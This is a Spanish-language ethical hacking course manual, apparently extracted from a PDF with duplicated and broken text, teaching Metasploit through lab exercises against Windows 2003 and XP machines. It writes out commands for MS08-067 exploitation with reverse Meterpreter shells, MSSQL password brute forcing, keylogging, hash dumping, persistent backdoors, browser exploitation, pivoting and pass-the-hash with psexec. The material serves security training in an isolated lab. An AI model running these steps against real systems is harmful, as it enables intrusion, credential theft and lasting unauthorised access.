Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Cpods PDF
Cpods PDF
Taller de entrenamiento:
Penetration Testing con Metasploit
Framework v 1.0
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Facilidad de uso: desde el usuario inexperto y novato en las pruebas de seguridad a sistemas
de información, hastaa el usuario experto que tiene las capacidades de crear códigos de
explotación, puede hacer uso de todo el potencial de Metasploit como parte esencial de las
herramientas que usan para la realización de las pruebas de seguridad a los sistemas
informáticos.
Multiplataforma:: Otra razón de peso para aprovechar todo el potencial de Metasploit, es que
puede ser usado en diferentes sistemas operativos como Linux, Windows, Unix, entre otros,
sin perder en ningún momento la potencia del software Metasploit, independiente
independiente del sistema
operativo que usa el usuario final.
La comunidad: Metasploit fue liderado por un experto Hacker llamado HD Moore en el año
2003, sin embargo con el pasar de los años, muchos expertos en desarrollo de códigos de
explotación se han sumado do a este gran proyecto, con lo que miles de programadores del
mundo en la actualidad programan códigos de explotación de vulnerabilidades y los integran a
Metasploit, ayudando así a que la base de datos de exploit en Metasploit, sea de las más
completas enn el mundo, y se mantenga bien actualizada.
Para comenzar de forma adecuada el estudio, análisis y práctica con el software de explotación
Metasploit, es importante conocer la estructura de Metasploit y algunos conceptos base
relacionados con la explotación
ón de vulnerabilidades.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Módulos: Los módulos son pequeños componentes del sistema, donde cada modulo realiza
una tarea específica,, la cual puede ser llamada en algún momento para integrarse a otros
módulo, y poder hacer así una tarea más representativa
tativa de forma completa y compuesta por
varios módulos.
ShellCode: El shellcode se define como un conjunto de instrucciones que son utilizadas por un
Payload cuando el proceso de explotación se ejecuta. Por lo regular en Shellcode está escrito
en lenguaje
je Ensamblador (Assembly). En la mayoría luego de que se ejecute el código
Shellcode se recibe al usuario atacante y/o auditor de seguridad una Shell de comandos.
Fuente: http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture
http://www.offensive unleashed/Metasploit_Architecture
Libraries (Librerías): Las diferentes librerías son usadas de forma clave para el adecuado
funcionamiento de Metasploit, ya que estas son una agrupación de tareas definidas,
operaciones y funciones que pueden ser usados por los diversos módulos que componen
Metasploit. Una de las Libreríasmás importantes en el Framework de explotación
explotaci Metasploit
es la Librería Rex, la cual es la base para la mayoría de tareas, ya que dentro de esta librería se
encuentran componentes de gran importancia como las implementaciones de los protocolos a
nivel de servidor y cliente.
Luego se tiene la Librería "MSF Corelibrary", esta librería tiene como funciona principal la
implementación de todas las internases requeridas, las cuales permiten el trabajo de forma
conjunta con los módulos de explotación, las sesiones, entre otros.
Interfaces: El entorno de trabajo de Metasploit, ofrece diferentes tipos de interfaces, cada una
de ellas con sus fortalezas
zas y debilidades. Las interfaces son las siguientes:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
con abrir una shell de comandos y digitar el comando msfconsole,, tal y como se aprecia en la
siguiente imagen.
Luego debe de abrirse la interface msfconsole, tal y como se aprecia en la siguiente imagen.
Al principio la interface puede parecer un poco compleja, pero a medida que el usuario va
conociendo los diferentes comandos, se podrá apreciar la facilidad de trabajo bajo la interfaces
msfconsole. Para usar laa ayuda dentro de la interface msfconsole, se debe de digitar el
siguiente comando: msfconsole -h
Un listado completo de los comandos soportados por la consola msfconsole, puede ser
consultado en la siguiente URL:
http://www.offensive-security.com/metasploit
security.com/metasploit-unleashed/Msfconsole_Commands
unleashed/Msfconsole_Commands
Msfcli: Es una consola que se ejecuta directamente desde la línea de comandos (Shell). A
diferencia de msfconsole, msfscli es una
una consola más limitada, en la cual de igual forma se
pueden lanzar exploits, configurar módulos auxiliares, entre otros. A pesar de que su uso es
limitado frente a msfconsole, msfcli es una interface de gran utilidad para ejecutar tareas tales
como: probarr nuevos exploits, realizar explotación específica cuando el usuario conoce el
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
exploit y las opciones, automatización básica y con scripts, además es adecuado para el
aprendizaje de Metasploit
Es importante tener presente que msfcli, solo puede manejar una shell o un hilo de conexión a
la vez. En la siguiente imagen se podrá ver un ejemplo de uso de msfcli.
Msfweb: Es una consola web de fácil uso, del tipo apunte y tire o "Point-and-click".
"Point
Relativamente ha sido considerada como una consola inestable y de poco uso. Para este
modulo del di lomado en seguridad, no se hará uso de este tipo de interface.
Armitage: Es una interface grafica a nivel de usuario, creada por Raphael Mudge, la cual posee
muchas características y se integra con Metasploit de forma gratuita. Para este modulo el
diplomado y/o taller de seguridad no se hará mucho énfasis en Armitage, pero vale la pena
que el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el
buen manejo de la consola msfconsole, y que esté familiarizado con Metasploit Framework. En
el siguiente link se encuentra un interesante curso de puesta en marcha y pruebas con
Armitage. http://www.ethicalhacker.net/content/view/379/2/
En la siguiente imagen se puede observar la interface Armitage.
Armi
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
MsfEncode: Los códigos del tipo “Shell code” generados pro msfpayload son totalmente
funcionales, sin embargo muchos
muchos de estos códigos contienen caracteres nulos, los cuales al ser
interpretados por muchos programas, pueden causar que el código no se ejecute de forma
completa. Además de que los Shellcode generados muy probablemente lleguen a la victima
pasando por redeses que estén siendo vigiladas y protegidas por sistemas detectores de intrusos
y software antivirus. Por todas las razones expuestas anteriormente los desarrolladores de
Metasploit crearon Msfencode, el cual es una utilidad que ayuda a evitar que el shellcode
shel
preparada por el auditor informático y/o Pentester, sea indetectable y no contenga caracteres
que afecten la ejecución del código antes de tiempo. Metasploit contiene diferentes encoders
(Codificador) para diversas situaciones. Para identificar la lista
lista de opciones de la utilidad
msfencode, se debe de digitar el comando que se aprecia en la siguiente imagen:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Exploit Activos: Son códigos de explotación que se ejecuten en la maquina victima de forma
completa, incluyendo la finalización del código. Algunos ejemplos de exploits activos
act son:
ms08_067_netapi
smb/psexec
Exploit Pasivos: Son códigos de explotación que esperan a que las victimas se conecten a ellos.
Por lo regular son los códigos exploits que están del lado del cliente (ClienSide).
Singles: Son tipos de Payloads que son autónomos e independientes, y se ven representados
rep
en acciones como crear un usuario o abrir la calculadora (calc.exe) en el sistema víctima.
Stagers: Son tipos de Payloads diseñados de un modo pequeño y fiables y permiten configurar
una conexión de red entre la víctima y el atacante.
Stages: Son tipos de Payloads un poco más pesados, y permiten descargar y hacer procesos en
el sistema víctima tales como Inyección VNC, Meterpreter, entre otros.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
• Cargar Un Keylogger(Módulo
Keylogger(Módulo que graba las pulsaciones en el teclado) en el sistema
victima
• La comunicación entre el atacante (Auditor) victima (objetivo de evaluación) es cifrada
• Hacer capturas de pantalla(Screenshot) en el sistema victima
• Subir y descargar archivos entre el sistema
siste víctima y el atacante y/o auditor.
• Apagar el sistema victima
• Manipular el registro de Windows en el sistema victima (Acceso Lectura/Escritura)
• Abrir una Shell de comandos en el sistema victima
• Migrar de procesos en el sistema victima
• Obtener los Hash dee los usuarios del sistema victima
• Pivoting entre subredes en el sistema y/o red victima
• Evita la creación de procesos en el sistema victima
• Evita la creación de archivos en el disco duro del sistema victima
• Es una herramienta que sirve tanto en el proceso de explotación, como en el de post-
post
explotación.
• Se pueden usar múltiples canales de comunicación entre la víctima y el atacante
(Auditor) usando la misma conexión.
• Acceso al sistema de archivos en el sistema victima
• Ejecución de comandos en el sistema victima
vic
• Obtener información del sistema victima
• Es un Payload estable y altamente flexible
• Deshabilitar el software antivirus
• Capturar trafico de red en el sistema victima
• Y Mucho mas……………………
En la siguiente imagen podemos apreciar una Shell Meterpreter que se le ha dado al usuario
atacante y/o auditor de seguridad, luego de que este ha realizado una intrusión exitosa sobre
un sistema vulnerable con S.O Windows XP.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Para usar la ayuda de meterpreter, basta con digitar el comando help directamente desde
des la
consola meterpreter.
A medida que avanza el curso de seguridad, veremos cómo utilizar Meterpreter en los
procesos de auditorías de seguridad y teste de penetración. Meterpreter será una de las
herramientas que más se usa en los procesos de explotación
explotación de este curso de seguridad
informática.
Otros Payloads importantes que se deben manejar y conocer dentro del entorno de trabajo de
Metasploit Framework:
windows/vncinject/reverse_tcp
windows/shell/reverse_tcp
windows/shell_bind_tcp
• La explotación y la post-explotación
post explotación son las últimas fases de proceso de auditoría de
seguridad ética (Hacking ético) y/o Test de penetración, por lo que antes de proceder
al lanzar el primer proceso de explotación con Metasploit, el estudiante debe de
manejar de forma completa las anteriores fases del Hacking Ético tales como: co
Recolección de información, Scanning de puertos, Enumeración y Scanning de
vulnerabilidades.
• Tener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden
encontrar de forma completa en la siguiente Url: http://www.offensive-
http://www.offensive
security.com/metasploit
security.com/metasploit-unleashed/Msfconsole_Commands
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
msf> show exploits: Este comando muestra todos los códigos de explotación que están
disponibles en metasploit Framework (La cantidad de exploits depende de la fecha de
actualización de metasploit). El anterior comando es de gran importancia, ya que cada día
d se
descubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos códigos de
explotación a metasploit framework. En la siguiente imagen se puede apreciar un ejemplo de
la ejecución de este comando.
msf> show auxiliary: Los módulos auxiliares en metasploit, tienen variedad de propósitos,
tales como: Scanners de red, Scanners de servicios, fuzzers, entre otros. Por lo tanto la
ejecución del comando en mención muestra en pantalla los módulos auxiliares disponibles
para metasploit framework.
work. (La cantidad de módulos auxiliares depende de la fecha de
actualización de metasploit)
Prácticas de Laboratorio:
Paso 1:: Ingresar a Linux Backtrack, y abrir una shell de comandos (Terminal). (Recordar que el
usuario y passqord respectivamente para para Backtrack, es root y toor. Luego desde la shell de
comandos digitar startx para entrar al modo grafico)
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Paso 2: abrir la consola msfconsole, lo cual se logra digitando el comando msfconsole desde la
terminal de comandos de Linux Backtrack
Anotación: Para ingresar a la interface msfconsole, y a las otras interfaces que nos ofrece
metasploit, también lo podemos hacer por el entorno grafico.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Paso 3: digitar el comando msfconsole -h, para poder ver la ayuda de la interface msfconsole
Paso 5: Una vez que se tiene una visión general sobre algunas de las interfaces de metasploit,
es importante tener presente
presen que el software debe de quedar actualizado a los últimos
exploits, payloads, módulos auxiliares, entre otros. Para actualizar metasploit, simplemente
desde una shell de msfconsole,
msfconsole digitamos el comando msfupdate.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Anotación:: Para efectos de este taller, ya se entrega Linux Backtrack con Metasploit
actualizado al día. Lo anterior para fines de optimizar tiempos, ya que actualizar metasploit en
el equipo e cada estudiante, puede tomar algún tiempo, según la velocidad del canal de
Internet en donde se dicta el taller.
Observaciones:
Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos básicos-medios
básicos medios al respecto de los
servicios de red que se están evaluando y próximamente
próximamente atacando, para comprender
mejor el trabajo de análisis de seguridad y/o penetration testing realizado.
Paso 2: digitar el comando db_status, para identificar que metasploit esté conectado a una
base de datos llamada msf3dev
dev
Paso 3:: digitar el comando db_nmap dirección IP Target (Windows Server 2003)
Paso 4: digitar el comando hosts para ver los resultados de los host que se tienen guardados
en la base de datos. Para el siguiente caso, se tienen dos host.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Paso 5:: realizar un scanning de puertos usando nmap, con la opción de exportar los resultados
resul
del scanning a un archivo del tipo XML. El scanning de puertos se puede hacer a un solo host, o
directamente a toda una subred. Para el caso hacerlo sobre la maquina Windows 2003 Server.
Los resultados del anterior proceso de scanning, deberían de ser importados a la base de datos
de metasploit.
Paso 6:: Una vez que se tienen algunos host registrados en la base de datos, con el comando
services,, se pueden identificar los servicios que están a la escucha en las maquinas victimas.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Paso 7: realizar
zar un proceso de Scanning de puertos usando los modulos auxiliares de nmap que
están dentro de metasploit. Para lograrlo primero debemos de hacer una na búsqueda con el
comando search de los módulos auxiliares de metasploit que tiene la función de scanning de
puertos, lo cual e logra con el siguiente comando: search portscan
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Dar el comando show options para ver las variables que necesita el modulo para poder
trabajar.
Paso 9:: Indicar las variables que se necesita para realizar el scanning
scanning de puertos, para el caso
solo vamos a asignar valores a la variable RHOST que es la maquina target-victima,
target victima, a la cual el
vamos a realizar el scanning de puertos, y vamos a asignarle valores a la variable PORTS, que
corresponde a los puertos TCP que vamos a verificar si están abiertos, cerrados o filtrados.
Según lo anterior los comandos para asignar los valores para ambas variables son:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Una vez que se ejecute el modulo auxiliar contra uno dee los targets (Objetivos de evaluación),
debe de salir los siguientes resultados (Recordar que las direcciones IP varían de acuerdo a
cada target de cada segmento de red de las maquinas virtuales)
Ir más allá: Para usuarios más avanzados y/o experimentados con metasploit, que tal si
ejecutan el anterior comando, pero colocando un sniffer como wireshark de forma paralela al
scanning de puertos, para capturar el tráfico y verificar el tráfico de red para un scanning de
puertos del tipo SYN.
Observaciones:
Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamentete importante tener conocimientos básicos-mediosmedios al respecto de los
servicios de red que se están evaluando y próximamente atacando, para comprender
mejor el trabajo de análisis de seguridad y/o penetration testing realizado.
Paso 1: Trabajando con el Protocolo SMB: Realizar un proceso de scanning del servicio SMB
(Server Message Block Scanning), para lo cual se debe de seleccionar el modulo auxiliar
auxiliary/scanner/smb/smb_version Para poder usar este modulo,
auxiliary/scanner/smb/smb_version. o, se debe realizar de forma
secuencial lo siguiente:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:
use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS IP Windows Server
exploit
En la siguiente
nte imagen encuentras de forma secuencial todos los pasos mencionados
anteriormente.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:
use auxiliary/scanner/ssh/ssh_version
show options
set RHOSTS IP Windows XP SP2
exploit
use auxiliary/scanner/snmp/snmp_enumshares
show options
set RHOSTS 192.168.137.28
run
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Anotación: Y de forma similar existen muchísimos más módulos auxiliares a nivel de scanners
de puertos y aplicaciones, los cuales evalúan otros protocolos tales como FTP, MSSQL, SNMP,
entre otros.
Observaciones:
Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server están conectados en el mismo segmento de de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos básicos-medios
básicos medios al respecto de los
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
use auxiliary/scanner/mssql/mssql_login
show options
set PASS_FILE /pentest/passwords/john/password.lst
set RHOSTS 192.168.137.28 (Aquí colocas la dirección IP de Servidor Windows)
set VERBOSE false
show options
exploit
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Ir más allá: Para complementar este ejercicio, insertar realizar un análisis de vulnerabilidades
vulnerabili
usando el Software NESSUS, revisar en los reportes de este software, que se identifican otro
tipo de vulnerabilidades criticas que pueden ser explotadas usando Metasploit Framework.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
HEAD / HTTP/1.0
En la anterior imagen se puede observar perfectamente que el servidor web del equipo
Windows 2003 Server, es IISS 6.0, software que tiene muchísimas vulnerabilidades conocidas y
códigos de explotación para aprovecharse de dichas vulnerabilidades.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
En la anterior imagen se puede observar los resultados del comando ejecutado, donde se
puede observar que se identifico una vulnerabilidad en el puerto 445 TCP.
Observaciones:
Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos básicos-medios
básicos medios al respecto de los
servicios de red que se están atacando, para comprender mejor el trabajo de análisis
de seguridad y/o penetration testing realizado.
Esta práctica tiene como objetivo principal, que el estudiando
estudiando se vaya ambientando
con la ejecución de exploits dentro de metasploit.
La vulnerabilidad MS 08-07,
08 aun puede verse en n algunos equipos, pero en casos muy
concretos y especiales,
especiales tales como equipos XP-Server 2003 recién formateados, no
parchados,, sin el firewall activo. Esta explotación no puede hacerse desde la WAN,
porque los routers de los ISP bloquean el trafico para puertos como el 445,139, etc. El
EXPLOIT ms08-07 07 es altamente utilizado en las academias para cursos básicos y
avanzados dee hacking, para poder enseñar todas las funcionalidades de metasploit.
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Paso 1: Explotación ción de vulnerabilidades servicios SMB: Una vez identificada las
vulnerabilidades en diversos servicios de red, procedemos a realizar la respectiva explotación
de algunos de ellos que presentan vulnerabilidades conocidas. Para explotar la vulnerabilidad
identificada
entificada con NMAP y con NESSUS descrita como MS08-67,
MS08 67, debemos realizar lo siguiente:
(Para el siguiente ejercicio de explotación, tener presente el siguiente esquema:
Por lo anterior, se debe de identificar que se necesita el puerto TCP 445 abierto (Ver
resultados NMAP Anteriores),
Anteriores), correspondiente al servicios CIFS/SMB, además que se
necesita la dirección IP del equipo victima asignada.
Para asignar la dirección IP de la víctima , debemos de ejecutar el siguiente comando:
set RHOST Dirección IP Victima (192.168.119.225 por Ejemplo).
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Luego se debe de ingresar de nuevo el comando show options para verificar que en
efecto el valor de la dirección IP de la víctima fue asignado a la variables RHOST.
El siguiente paso es verificar cuales son los PAYLOAD que pueden usarse con este est
Exploit, para lo cual daremos el siguiente comando: show payloads
Luego se debe de elegir uno de los PAYLOAD disponibles, para el caso de este ejercicio,
y de las explicaciones presentadas en el Diplomado, vamos a elegir el siguiente
payload:
windows/meterpreter/reverse_tcp
terpreter/reverse_tcp
Para asignar este PAYLOAD a nuestro Exploit, se debe de ejecutar el siguiente
comando: set PAYLOAD windows/meterpreter/reverse_tcp
Luego la Shell (Consola de METASPLOIT), nos indica que el PAYLOAD se ha cargado.
Luego debemos de dar el e comando show options,, para ver las opciones que se
necesita asignar al PAYLOAD elegido.
El PAYLOAD elegido, necesita la variable LHOST, justo como se muestra en la siguiente
imagen (LHOST=Host Local, de donde se lanzara el Exploit, para el caso es la IP del
equipo Linux Backtrack)
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Meterpreter tiene muchas opciones, pero para el caso, vamos a usar la opción que
me permite obtener una shell en el equipo víctima, lo cual podemos lograr
ingresando el siguiente comando en la consola de meterpreter: shell
Nota: Antes de lanzar el comando shell, entrar al equipo víctima, como usuario final, y
verificar por el administrador de tareas cuantos CMD.exe hay ejecutándose, luego
hacer
cer los mismo, pero después de lanzado el comando shell.
Anotación:
otación: si se presenta algún problema con la ejecución de la shell, digita desde la consola
meterpreter el comando getsystem,
getsystem, para escalar privilegios en el sistema atacado.
El siguiente paso es crear algunas carpetas en la raíz del disco C: del equipo
víctima, usando el comando mkdir. Luego se debe de ingresar al equipo víctima,
como si fuéramos un usuario normal del equipo, y verificar que en efecto se han
creado las carpetas. (Recordar crear la carpeta dentro del disco C, y no dentro de
system32, para efectos de facilidad en la visualización del directorio creado)
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Todas los valores a las anteriores variables, se asignan con el comando set
Jugando con Meterpreter: Teniendo presente que meterpreter tiene muchas funcionalidades,
salimos de la consola de comandos msdos (En caso de estarlo), y desde meterpreter,
comenzamos a usar varios comandos.
Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr
con el comando ps,
ps desde las shell de meterpreter.
Posteriormente debemos de identificar con que proceso nos pudimos colar en el
sistema victima Windows 2003 Server.
Server. Lo cual podemos identificar ejecutando el
comando: getpid, desde las shell de meterpreter. Luego ejecutamos de nuevo el
comando ps e identificamos el nombre del proceso con que ingresamos al sistema
víctima.
El siguiente paso es colocar en funcionamiento
funcionamient un Keylogger en el equipo víctima,
para poder registrar las pulsaciones del teclado.
Para lograr que el Keyloggerr funcione de manera adecuada, se debe de hacer lo
siguiente:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Finalizando esta paso del laboratorio, vamos a obtener todos los hash de los usuarios creados
en el sistema víctima, lo cual
cua podemos hacer con el comando hashdump desde la consola
meterpreter
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Anotación: Los hash obtenidos también se pueden copiar y pegar en el siguiente sitio web
y allí también pueden ser crackeados.
crackeados http://www.md5decrypter.co.uk
auxiliary/analyze/jtr_crack_fast
post/windows/gather/credentials/credential_collector
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Para poder ejecutar estos dos módulos de forma paralela,, se debe de continuar
ejecutando los siguientes pasos:
desde msfconsole seleccionar el módulo auxiliar:
post/windows/gather/credentials/credential_collector
El anterior modulo se carga en metasploit
metaspl con el siguiente comando:
use post/windows/gather/credentials/credential_collector.
post/windows/gathe
Luego se da el comando show options y se observa que se le debe de indicar alguna de
las sesiones que se tengan activas en el moento, que para el caso deberíamos de tener
dos, una sesión para la explotación d MSSQL y otra la explotación SMB.
indicar la sesión activa con el siguiente comando: set SESSION 1
Luego se ejecuta el modulo auxiliar con el comando run
Como se puede observar en el siguiente resultado del comando, se obtienen todos los
hash de los usuarios de Windows.
Windo
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Finalmente observamos que el módulos nos obtuvo todas las contraseñas (Darle
paciencia para obtener las contraseñas, ya que se demora un poco)
Observaciones:
Antes de proceder a realizar la práctica, verificar que las
las maquinas Linux Backtrack y
Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos básicos-medios
básicos medios al respecto de los
servicios de red que se están atacando, para comprender
comprender mejor el trabajo de análisis
de seguridad y/o penetration testing realizado.
Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando
con la ejecución dee exploits dentro de metasploit, y con la consola meterpreter
Paso 1: Colocar una puerta trasera con meterpreter como servicio: Teniendo presente que
meterpreter nos permite hacer muchísimas tareas de explotación y post-explotación
post explotación en la
maquina víctima, vamos a proceder a dejar
dejar a meterpreter como una puerta trasera en la
maquina víctima, para que nos permita conectarnos a la victima cada que necesitemos
hacerlo, y no dependa la explotación directamente de una vulnerabilidad conocida, ya que
esta puede ser solventada por el administrador
admi de red. Para lograr esta tarea, se debe de hacer
lo siguiente:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Paso 2: Colocar una puerta trasera con meterpreter como servicio persistente:
persistente
Teniendo presente que meterpreter nos permite hacer muchísimas tareas de
explotación y post-explotación
explotación en la maquina
maquina víctima, vamos a proceder a dejar un
servicios persistente que este llamando al atacante por un puerto determinado,
determ y cada
tiempo determinado, lo cual se logra realizando lo siguiente:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Observaciones:
Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos básicos-medios
básicos medios al respecto de los
servicios de red que se están atacando, para comprender mejor el trabajo de análisis
de seguridad y/o penetration testing realizado.
Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando
con la ejecución de exploits dentro de metasploit, y con la consola meterpreter
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
autopwn Continuando
Paso 2: Explotación de navegadores con el modulo Browser autopwn: ntinuando con los
procesos
rocesos de explotación del lado,
lado, ahora vamos a configurar el exploit llamado use
liary/server/browser_autopwn, el cual se aprovecha de vulnerabilidades conocidas de
auxiliary/server/browser_autopwn
varios navegadores. Para ejecutar este exploit, debemos de realiza lo siguiente:
Anotación: hay que darle un poco de paciencia a la ejecución de este exploit ya que lanza
varios códigos de explotación y al final nos muestra las sesiones que logro abrir en la máquina
víctima.
Observaciones:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Esta práctica debe de hacerse desde dos maquinas físicas, 4 maquinas virtuales
Anotación general
al de la práctica 8:
Nota: Tener presente que en el esquema anterior los puntos rojos representan dos tarjetas de
red en el servidor Windows 2003, cada una de ellas debe de esta configurada con diferentes
subredes (Segmentos de red). La que está conectada al segmento de red que está en bridge,
esta suministrada directamente por el servidor DHCP de la maquina local. Y la otra tarjeta
podemos asignarle una dirección IP como la 10.0.0.1 mascara 255.255.255.0. Tener presente
primero prender el Windows server y renombrar la tarjeta de red actual como WAN, y la otra
que se va a crear, se renombra como LAN.
LAN
Los pasos que se deben de realizar paso para poder lograr el proceso de pivoting en la
maquina victima (Windows XP Victima final) es el siguiente:
1) Lo primero es configurar
igurar las tarjetas de red para el laboratorio, las cuales se configuran de la
siguiente manera:
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Windows Server: debe de tener dos tarjetas de red una conectada en modo bridge, y la
segunda la vamos a conectar en modo VMNET2. Justo como se puede apreciar en la siguiente
imagen.
Recordar que la que está en bridge, obtiene DHCP por medio de la red LAN, y la que está en
VMNET2 se le configura manualmente una 10.0.0.1/24.
2) Una vez configuradas las tarjetas de red, el siguiente paso es integrar a Windows XP al
dominio que se encuentra en Windows Server 2003.
3) El tercer paso es vulnerar a Windows Server por su tarjeta de red configurada en modo
Bridge. Lo anterioror se hace desde Linux BT5. Recordar que BT5 debe de estar configurado
también en modo Bridge, y por el segmento de red de Windows Server. Se recomienda usar un
exploit al cual sea vulnerable, y en el PAYLOAD usar Windows Meterpreter Reverse TCP.
4) El cuarto
uarto paso es averiguar cuantas tarjetas de red tiene el equipo víctima, y la configuración
de estas. Si todo va hasta aquí bien, se deben de identificar 2 tarjetas de red.
red
Con el anterior comando se puede identificar otros host conectados al segmento de red
alterno del servidor 2003.
5) Salir de meterpreter con el comando background para proceder a agregar una ruta a
nuestra maquina, lo cual hacemos con el siguiente
siguie comando:
route add 10.0.0.0 255.255.255.0 1 (ojo el ultimo 1 pertenece a la sesión que se abrió con
Meterpreter)
© www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training
Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes comandos:
6) Una vez que se tiene laa ruta, el siguiente paso es sacar los Hash de los usuarios del dominio
llamado METASPLOIT. Lo o anterior ya se vio en prácticas de laboratorio pasadas.
7) El siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso del
modulo auxiliar de Metasploit llamado:
llamado auxiliary/scanner/portscan/tcp.. Este módulo nos pide
los puertos, que para el caso vamos a darle 80,135,139,445, y nos pide la víctima,
víctima que para el
caso solo vamos a comenzar el Scanning desde la IP 10.0.0.1 hasta la 10.0.0.15. Luego le
damos run, y si todo va bien, debemos de ver la IP 10.0.0.11, perteneciente a Windows XP, con
todos sus respectivos puertos abiertos.
Lanzar exploit:
8) Se puede proceder a lanzar de nuevo el exploit NETAPI, pero esta vez se realiza contra el
equipo Windows XP, pero esta vez se debe de ejecutar el PAYLOAD meterpreter/bind_tcp
9) También podemos lanzar otro ataque al protocolo SMB, lo cual podemos realizar con el
PAYLOAD llamado: exploit/windows/smb/psexec.
exploit/windows/smb/psexec Cuando seleccionemos
ccionemos este PAYLOAD, se le
deben de asignar las siguientes variables (Tener presente que para este exploit se requiere de
los hash que obtuvieron en pasos anteriores de esta práctica).
RHOST: 10.0.0.11
SMBUser administrator
SMBPass se le coloca el hash obtenido en puntos anteriores de esta práctica (Ojo copiar y
Pegar el HASH, en lo que respecta al contenido que esta antes de :::)
SMBDomain (Colocar el nombre del dominio, el cual debe de ser METASPLOIT)
Y por último el PAYLOAD, el cual es Meterpreter/bind_tcp.
Meterpreter/bi
Finalmente se ejecuta con el comando run
© www.dsteamseguridad.com